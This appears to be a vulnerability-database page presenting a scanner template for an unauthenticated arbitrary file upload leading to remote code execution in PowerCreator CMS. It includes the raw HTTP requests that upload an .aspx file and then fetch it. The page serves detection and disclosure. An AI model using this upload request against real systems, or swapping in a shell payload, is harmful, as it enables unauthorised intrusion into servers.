powercreator-cms-rce: PowerCreator CMS - Remote Code Execution

日期: 2025-08-01 | 影响软件: PowerCreator CMS | POC: 已公开

漏洞描述

PowerCreator CMS is susceptible to a remote code execution vulnerability.

PoC代码[已公开]

id: powercreator-cms-rce

info:
  name: PowerCreator CMS - Remote Code Execution
  author: pikpikcu
  severity: critical
  description: |
    PowerCreator CMS is susceptible to a remote code execution vulnerability.
  reference:
    - https://wiki.96.mk/Web%E5%AE%89%E5%85%A8/PowerCreatorCms/PowerCreatorCms%E4%BB%BB%E6%84%8F%E4%B8%8A%E4%BC%A0/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cwe-id: CWE-77
  metadata:
    max-request: 2
  tags: rce,powercreator,intrusive,fileupload,vuln

http:
  - raw:
      - |
        POST /upload/UploadResourcePic.ashx?ResourceID=8382 HTTP/1.1
        Host: {{Hostname}}
        Content-Disposition: form-data;name="file1";filename="poc.aspx";
        Content-Type: multipart/form-data; boundary=---------------------------20873900192357278038549710136

        -----------------------------20873900192357278038549710136
        Content-Disposition: form-data; name="file1"; filename="poc.aspx"
        Content-Type: image/jpeg

        {{randstr}}
        -----------------------------20873900192357278038549710136--
      - |
        GET /ResourcePic/{{endpoint}} HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: endpoint
        internal: true
        part: body
        regex:
          - "(.*?.ASPX)"
    matchers:
      - type: dsl
        dsl:
          - "contains(body_2, '{{randstr}}') && status_code_2 == 200"
# digest: 4b0a00483046022100edc4158d5a22ea29d0a996c1a70a7ced7b1bca191ca2cdf1eedba01bc0e35a960221009c5dc6b5666097d067ecd9293a6334c09f56c0350d2cc4e7800d50585cbf3c46:922c64590222798bb761d5b6d8e72950

相关漏洞推荐